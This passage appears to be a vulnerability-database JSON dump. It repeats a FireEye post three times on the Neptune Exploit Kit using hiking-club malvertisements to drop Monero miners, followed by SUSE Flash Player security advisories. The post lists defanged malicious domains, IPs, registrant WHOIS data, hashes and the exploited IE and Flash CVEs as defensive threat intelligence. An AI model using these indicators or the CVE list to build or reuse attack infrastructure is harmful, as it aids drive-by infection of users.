dangerous considering drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting of the user.\n\nFireEye NX [detects exploit kit infection attempts](<https://www.fireeye.com/products/nx-network-security-products.html>) before the malware payload is downloaded to the user\u2019s machine. Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.\n\n#### Indicators of Compromise\n\n##### Malvertisement domains:\n\n * hxxp://treknepal[.]club/\n * hxxp://highspirittrecks[.]club\n * hxxp://advnepaltrekking[.]club\n * hxxp://nepalyogatrek[.]club\n * hxxp://flvto[.]download\n\n##### Malvertisement IPs:\n\n * 95.85.62.226\n * 185.82.202.36\n\n##### EK domains (current active) registrant:\n\nDomain Name: MANAGETHEWORLD.US \nDomain ID: D59392852-US \nSponsoring Registrar: NAMECHEAP, INC. \nSponsoring Registrar IANA ID: 1068 \nRegistrar URL (registration services): http://www.namecheap[.]com \nDomain Status: clientTransferProhibited \nRegistrant ID: NLGUS4BVD3M2DN2Y \nRegistrant Name: kreb son \nRegistrant Address1: Maker 541 \nRegistrant City: Navada \nRegistrant State/Province: SA \nRegistrant Postal Code: 546451 \nRegistrant Country: Bulgaria \nRegistrant Country Code: BG \nRegistrant Phone Number: +44.45623417852 \nRegistrant Email: gabendollar399@gmx[.]com \nRegistrant Application Purpose: P1 \nRegistrant Nexus Category: C11 \nAdministrative Contact ID: VNM50NNJ5Y0VNLDY \nAdministrative Contact Name: kreb son \nAdministrative Contact Address1: Maker 541 \nAdministrative Contact City: Navada \nAdministrative Contact State/Province: SA \nAdministrative Contact Postal Code: 546451 \nAdministrative Contact Country: Bulgaria \nAdministrative Contact Country Code: BG \nAdministrative Contact Phone Number: +44.45623417852 \nAdministrative Contact Email: gabendollar399@gmx[.]com\n\n##### Sample EK URI Pattern:\n\nforum_jVpbUAr/showthread.php?id=xxxxxxx\n\n##### Sample MD5s:\n\nb678ac0b870b78060a2a9f599000302d \n5a18c92e148bbd7f10077f8e7431326e\n\n#### Acknowledgement\n\nWe would like to thanks Hassan Faizan for his contributions to this discovery.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-22T14:00:00", "type": "fireeye", "title": "Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-2419", "CVE-2015-7645", "CVE-2015-8651", "CVE-2016-0189"], "modified": "2017-08-22T14:00:00", "id": "FIREEYE:2B54485AD5D7B8DCC55F5A6BE1F3DBD6", "href": "https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-12T20:44:52", "description": "Exploit kit (EK) activity has been on the decline ever since [Angler Exploit Kit was shut down](<https://securityintelligence.com/news/say-goodbye-to-the-angler-exploit-kit/>) in 2016. [Fewer people using Internet Explorer](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>) and a [drop in browser support for Adobe Flash](<https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/>) \u2013 two primary targets of many exploit kits \u2013 have also contributed to this decline. Additionally, some popular redirect campaigns using [PseudoDarkleech and EITest Gate to Rig Exploit Kit](<http://www.darkreading.com/attacks-breaches/rig-exploit-kit-takedown-sheds-light-on-domain-shadowing/d/d-id/1329085>) were shut down in first half of this year.\n\nDespite all this, [malvertising campaigns involving exploits kits](<https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html>) remain active. The Neptune Exploit Kit (or Terror EK), which initially started as a Sundown EK copycat operation, has relied heavily on malvertisements. Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:\n\n * networkmarketingpro3[.]us\n * networkmarketingpro2[.]us\n * onlinesalesproaffiliate1[.]us\n * onlinesalesproaffiliate2[.]us\n * onlinesalesproaffiliate3[.]us\n * onlinesalesproaffiliate4[.]us\n * onlinesalesproaffiliate5[.]us\n * onlinesalesproaffiliate6[.]us\n\nPayloads spread by Neptune Exploit Kit have since diversified. Recently, we have seen changes in Neptune EK\u2019s URI patterns, landing pages, malvertisement campaigns and login account details associated with the cryptocurrency mining payloads. \n\n#### Propagation\n\nSince July 16, our Dynamic Threat Intelligence (DTI) has observed changes in URI patterns for Neptune Exploit Kit. At the time of writing, the new campaign abuses a legitimate popup ad service (within Alexa\u2019s top 100) with redirects to ads about hiking clubs, as shown in Figure 1.\n\n \nFigure 1: Fake ad for a hiking club leading to Neptune EK\n\nRedirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other hiking fake ads use similarly spoofed legitimate site names with .club domains. Figure 2 shows a redirect from a fake site\u2019s pop-up.\n\n \nFigure 2: Silent redirect to EK landing page\n\nFireEye Dynamic Threat Intelligence (DTI) stats show the regions being affected by this campaign (Figure 3). \n\n \nFigure 3: Regions affected by the malvertisement campaign, as observed from customer data\n\nA few instances of the redirect involve flvto[.]download (mimicking the legitimate www.flvto[.]biz) instead of hiking club fake ads. Figure 4 and Figure 5 show the legitimate domain and fake domain, respectively, for comparison\u2019s sake.\n\n \nFigure 4: Real page, flvto[.]biz (Alexa rank 2,674)\n\n \nFigure 5: Fake page, flvto[.]download\n\nMost of the ads linked to this campaign have been observed on high-traffic torrent and multimedia hosting sites.\n\nSites are hosted on IP **95.85.62.226**. Reverse lookup for this IP shows:\n\n * 2watchmygf[.]stream\n * flvto[.]download\n * highspirittreks[.]club\n * treknepal[.]club\n\nOther hosted IPs and domains of the same campaign are in the Indicators of Compromise section at the end of the post. All IPs point to locations in Amsterdam.\n\nSince July 16, related EK infrastructure has been hosted on domains protected by Whois Guard. However, in recent activity, domains are linked to the Registrant email: \u2018gabendollar399@gmx[.]com\u2019. \n\nThe following domains are currently associated with this email:\n\n**Domain Name**\n\n| \n\n**Create Date**\n\n| \n\n**Registrar** \n \n---|---|--- \n \n[itsmebecauseyoua[.]pw](<https://whois.domaintools.com/itsmebecauseyoua.pw>)\n\n| \n\n2017-03-05\n\n| \n\n\\-- \n \n[loansforevery[.]us](<https://whois.domaintools.com/loansforevery.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[managetheworld[.]us](<https://whois.domaintools.com/managetheworld.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[nudecams[.]us](<https://whois.domaintools.com/nudecams.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n#### Exploits/Landing Page\n\nThe landing page for the Neptune Exploit Kit redirects to further HTML and Adobe Flash exploit links after it checks the Flash versions installed on the victim\u2019s machine (see Figure 6).\n\n \nFigure 6: Landing page of Neptune EK\n\nThis EK exploits multiple vulnerabilities in one run. Most of these exploits are well-known and commonly seen in other exploit kits.\n\nCurrently, Neptune EK uses three Internet Explorer exploits and two Flash exploits:\n\n * [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) \u2013 Internet Explorer\n * [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) \u2013 Internet Explorer\n * [CVE-2014-6332](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) \u2013 Internet Explorer\n * [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) \u2013 Adobe Flash Player\n * [CVE-2015-7645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645>) \u2013 Adobe Flash Player\n\n#### Payload (Monero miner)\n\nThe payload is dropped as a plain executable from one of the URI\u2019s belonging to the EK domain (same as the landing page). Figure 7 shows a typical response header for these cases.\n\n \nFigure 7: Response header for Monero miner payload\n\nPost infection traffic shows an attempt to connect to minergate[.]com (Figure 8) and a login attempt using the cpu-miner service via the login email monsterkill20@mail[.]com (Figure 9). Login attempts are invoked via the command line:\n\n\n\n \nFigure 8: DNS query to minergate[.]com\n\n \nFigure 9: Login attempt\n\n#### Conclusion\n\nDespite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially dangerous considering drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting of the user.\n\nFireEye NX [detects exploit kit infection attempts](<https://www.fireeye.com/products/nx-network-security-products.html>) before the malware payload is downloaded to the user\u2019s machine. Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.\n\n#### Indicators of Compromise\n\n##### Malvertisement domains:\n\n * hxxp://treknepal[.]club/\n * hxxp://highspirittrecks[.]club\n * hxxp://advnepaltrekking[.]club\n * hxxp://nepalyogatrek[.]club\n * hxxp://flvto[.]download\n\n##### Malvertisement IPs:\n\n * 95.85.62.226\n * 185.82.202.36\n\n##### EK domains (current active) registrant:\n\nDomain Name: MANAGETHEWORLD.US \nDomain ID: D59392852-US \nSponsoring Registrar: NAMECHEAP, INC. \nSponsoring Registrar IANA ID: 1068 \nRegistrar URL (registration services): http://www.namecheap[.]com \nDomain Status: clientTransferProhibited \nRegistrant ID: NLGUS4BVD3M2DN2Y \nRegistrant Name: kreb son \nRegistrant Address1: Maker 541 \nRegistrant City: Navada \nRegistrant State/Province: SA \nRegistrant Postal Code: 546451 \nRegistrant Country: Bulgaria \nRegistrant Country Code: BG \nRegistrant Phone Number: +44.45623417852 \nRegistrant Email: gabendollar399@gmx[.]com \nRegistrant Application Purpose: P1 \nRegistrant Nexus Category: C11 \nAdministrative Contact ID: VNM50NNJ5Y0VNLDY \nAdministrative Contact Name: kreb son \nAdministrative Contact Address1: Maker 541 \nAdministrative Contact City: Navada \nAdministrative Contact State/Province: SA \nAdministrative Contact Postal Code: 546451 \nAdministrative Contact Country: Bulgaria \nAdministrative Contact Country Code: BG \nAdministrative Contact Phone Number: +44.45623417852 \nAdministrative Contact Email: gabendollar399@gmx[.]com\n\n##### Sample EK URI Pattern:\n\nforum_jVpbUAr/showthread.php?id=xxxxxxx\n\n##### Sample MD5s:\n\nb678ac0b870b78060a2a9f599000302d \n5a18c92e148bbd7f10077f8e7431326e\n\n#### Acknowledgement\n\nWe would like to thanks Hassan Faizan for his contributions to this discovery.\n", "edition": 2, "cvss3": {}, "published": "2017-08-22T10:00:00", "type": "fireeye", "title": "Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189", "CVE-2015-8651", "CVE-2015-2419", "CVE-2015-7645"], "modified": "2017-08-22T10:00:00", "id": "FIREEYE:0CAA37548C7EBA899FA1174794304489", "href": "https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "Exploit kit (EK) activity has been on the decline ever since [Angler Exploit Kit was shut down](<https://securityintelligence.com/news/say-goodbye-to-the-angler-exploit-kit/>) in 2016. [Fewer people using Internet Explorer](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>) and a [drop in browser support for Adobe Flash](<https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/>) \u2013 two primary targets of many exploit kits \u2013 have also contributed to this decline. Additionally, some popular redirect campaigns using [PseudoDarkleech and EITest Gate to Rig Exploit Kit](<http://www.darkreading.com/attacks-breaches/rig-exploit-kit-takedown-sheds-light-on-domain-shadowing/d/d-id/1329085>) were shut down in first half of this year.\n\nDespite all this, [malvertising campaigns involving exploits kits](<https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html>) remain active. The Neptune Exploit Kit (or Terror EK), which initially started as a Sundown EK copycat operation, has relied heavily on malvertisements. Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:\n\n * networkmarketingpro3[.]us\n * networkmarketingpro2[.]us\n * onlinesalesproaffiliate1[.]us\n * onlinesalesproaffiliate2[.]us\n * onlinesalesproaffiliate3[.]us\n * onlinesalesproaffiliate4[.]us\n * onlinesalesproaffiliate5[.]us\n * onlinesalesproaffiliate6[.]us\n\nPayloads spread by Neptune Exploit Kit have since diversified. Recently, we have seen changes in Neptune EK\u2019s URI patterns, landing pages, malvertisement campaigns and login account details associated with the cryptocurrency mining payloads. \n\n#### Propagation\n\nSince July 16, our Dynamic Threat Intelligence (DTI) has observed changes in URI patterns for Neptune Exploit Kit. At the time of writing, the new campaign abuses a legitimate popup ad service (within Alexa\u2019s top 100) with redirects to ads about hiking clubs, as shown in Figure 1.\n\n \nFigure 1: Fake ad for a hiking club leading to Neptune EK\n\nRedirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other hiking fake ads use similarly spoofed legitimate site names with .club domains. Figure 2 shows a redirect from a fake site\u2019s pop-up.\n\n \nFigure 2: Silent redirect to EK landing page\n\nFireEye Dynamic Threat Intelligence (DTI) stats show the regions being affected by this campaign (Figure 3). \n\n \nFigure 3: Regions affected by the malvertisement campaign, as observed from customer data\n\nA few instances of the redirect involve flvto[.]download (mimicking the legitimate www.flvto[.]biz) instead of hiking club fake ads. Figure 4 and Figure 5 show the legitimate domain and fake domain, respectively, for comparison\u2019s sake.\n\n \nFigure 4: Real page, flvto[.]biz (Alexa rank 2,674)\n\n \nFigure 5: Fake page, flvto[.]download\n\nMost of the ads linked to this campaign have been observed on high-traffic torrent and multimedia hosting sites.\n\nSites are hosted on IP **95.85.62.226**. Reverse lookup for this IP shows:\n\n * 2watchmygf[.]stream\n * flvto[.]download\n * highspirittreks[.]club\n * treknepal[.]club\n\nOther hosted IPs and domains of the same campaign are in the Indicators of Compromise section at the end of the post. All IPs point to locations in Amsterdam.\n\nSince July 16, related EK infrastructure has been hosted on domains protected by Whois Guard. However, in recent activity, domains are linked to the Registrant email: \u2018gabendollar399@gmx[.]com\u2019. \n\nThe following domains are currently associated with this email:\n\n**Domain Name**\n\n| \n\n**Create Date**\n\n| \n\n**Registrar** \n \n---|---|--- \n \n[itsmebecauseyoua[.]pw](<https://whois.domaintools.com/itsmebecauseyoua.pw>)\n\n| \n\n2017-03-05\n\n| \n\n\\-- \n \n[loansforevery[.]us](<https://whois.domaintools.com/loansforevery.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[managetheworld[.]us](<https://whois.domaintools.com/managetheworld.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[nudecams[.]us](<https://whois.domaintools.com/nudecams.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n#### Exploits/Landing Page\n\nThe landing page for the Neptune Exploit Kit redirects to further HTML and Adobe Flash exploit links after it checks the Flash versions installed on the victim\u2019s machine (see Figure 6).\n\n \nFigure 6: Landing page of Neptune EK\n\nThis EK exploits multiple vulnerabilities in one run. Most of these exploits are well-known and commonly seen in other exploit kits.\n\nCurrently, Neptune EK uses three Internet Explorer exploits and two Flash exploits:\n\n * [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) \u2013 Internet Explorer\n * [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) \u2013 Internet Explorer\n * [CVE-2014-6332](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) \u2013 Internet Explorer\n * [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) \u2013 Adobe Flash Player\n * [CVE-2015-7645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645>) \u2013 Adobe Flash Player\n\n#### Payload (Monero miner)\n\nThe payload is dropped as a plain executable from one of the URI\u2019s belonging to the EK domain (same as the landing page). Figure 7 shows a typical response header for these cases.\n\n \nFigure 7: Response header for Monero miner payload\n\nPost infection traffic shows an attempt to connect to minergate[.]com (Figure 8) and a login attempt using the cpu-miner service via the login email monsterkill20@mail[.]com (Figure 9). Login attempts are invoked via the command line:\n\n\n\n \nFigure 8: DNS query to minergate[.]com\n\n \nFigure 9: Login attempt\n\n#### Conclusion\n\nDespite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially dangerous considering drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting of the user.\n\nFireEye NX [detects exploit kit infection attempts](<https://www.fireeye.com/products/nx-network-security-products.html>) before the malware payload is downloaded to the user\u2019s machine. Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.\n\n#### Indicators of Compromise\n\n##### Malvertisement domains:\n\n * hxxp://treknepal[.]club/\n * hxxp://highspirittrecks[.]club\n * hxxp://advnepaltrekking[.]club\n * hxxp://nepalyogatrek[.]club\n * hxxp://flvto[.]download\n\n##### Malvertisement IPs:\n\n * 95.85.62.226\n * 185.82.202.36\n\n##### EK domains (current active) registrant:\n\nDomain Name: MANAGETHEWORLD.US \nDomain ID: D59392852-US \nSponsoring Registrar: NAMECHEAP, INC. \nSponsoring Registrar IANA ID: 1068 \nRegistrar URL (registration services): http://www.namecheap[.]com \nDomain Status: clientTransferProhibited \nRegistrant ID: NLGUS4BVD3M2DN2Y \nRegistrant Name: kreb son \nRegistrant Address1: Maker 541 \nRegistrant City: Navada \nRegistrant State/Province: SA \nRegistrant Postal Code: 546451 \nRegistrant Country: Bulgaria \nRegistrant Country Code: BG \nRegistrant Phone Number: +44.45623417852 \nRegistrant Email: gabendollar399@gmx[.]com \nRegistrant Application Purpose: P1 \nRegistrant Nexus Category: C11 \nAdministrative Contact ID: VNM50NNJ5Y0VNLDY \nAdministrative Contact Name: kreb son \nAdministrative Contact Address1: Maker 541 \nAdministrative Contact City: Navada \nAdministrative Contact State/Province: SA \nAdministrative Contact Postal Code: 546451 \nAdministrative Contact Country: Bulgaria \nAdministrative Contact Country Code: BG \nAdministrative Contact Phone Number: +44.45623417852 \nAdministrative Contact Email: gabendollar399@gmx[.]com\n\n##### Sample EK URI Pattern:\n\nforum_jVpbUAr/showthread.php?id=xxxxxxx\n\n##### Sample MD5s:\n\nb678ac0b870b78060a2a9f599000302d \n5a18c92e148bbd7f10077f8e7431326e\n\n#### Acknowledgement\n\nWe would like to thanks Hassan Faizan for his contributions to this discovery.\n", "edition": 2, "cvss3": {}, "published": "2017-08-22T10:00:00", "type": "fireeye", "title": "Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189", "CVE-2015-8651", "CVE-2015-2419", "CVE-2015-7645"], "modified": "2017-08-22T10:00:00", "id": "FIREEYE:D549372E644DEECBB7AEE8031D35DA4D", "href": "https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:32:45", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote attackers to\n cause a denial of service (application crash) or possibly execute\n arbitrary code via unspecified vectors, as exploited in the wild in\n April 2016 Aliased: (bsc#974209).\n\n", "cvss3": {}, "published": "2016-04-26T17:08:38", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-26T17:08:38", "id": "OPENSUSE-SU-2016:1157-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00055.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:20:17", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote attackers to\n cause a denial of service (application crash) or possibly execute\n arbitrary code via unspecified vectors, as exploited in the wild in\n April 2016 Aliased: (bsc#974209).\n\n", "cvss3": {}, "published": "2016-04-08T15:08:43", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-08T15:08:43", "id": "OPENSUSE-SU-2016:0987-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00009.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:03:50", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2016-1019: Adobe Flash Player allowed remote attackers to cause a\n denial of service (application crash) or possibly execute arbitrary code\n via unspecified vectors, as exploited in the wild in April 2016\n (bsc#974209).\n\n", "cvss3": {}, "published": "2016-04-08T17:08:00", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-08T17:08:00", "id": "SUSE-SU-2016:0990-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00010.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:50:47", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote attackers to\n cause a denial of service (application crash) or possibly execute\n arbitrary code via unspecified vectors, as exploited in the wild in\n April 2016 Aliased: (bsc#974209).\n\n", "cvss3": {}, "published": "2016-04-08T22:07:39", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-08T22:07:39", "id": "OPENSUSE-SU-2016:0997-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00012.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:59:17", "description": "This security update for flash-player to 11.2.202.621 fixes the following\n issues (boo#979422):\n\n A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome\n OS. Successful exploitation could cause a crash and potentially allow an\n attacker to take control of the affected system. (APSA16-02)\n\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\">https://helpx.adobe.com/security/products/flash-player/apsa16-02.html</a>\n\n Some CVEs were not listed in the last submission:\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n\n", "cvss3": {}, "published": "2016-05-17T02:07:54", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2016-05-17T02:07:54", "id": "OPENSUSE-SU-2016:1306-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00045.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:44:54", "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.621 (bsc#979422):\n * APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102,\n CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110,\n CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111,\n CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got\n published afterwards:\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\n\n", "cvss3": {}, "published": "2016-05-16T18:08:08", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1102", "CVE-2016-1026", "CVE-2016-1098", "CVE-2016-1021", "CVE-2016-4108", "CVE-2016-1019", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-4116", "CVE-2016-1006", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-1023", "CVE-2016-4113", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-4112", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1106", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-1025", "CVE-2016-4115", "CVE-2016-1016", "CVE-2016-1105", "CVE-2016-1099", "CVE-2016-1015"], "modified": "2016-05-16T18:08:08", "id": "SUSE-SU-2016:1305-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00044.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2022-06-11T16:06:34", "description": "flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016 Aliased: (bsc#974209).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": 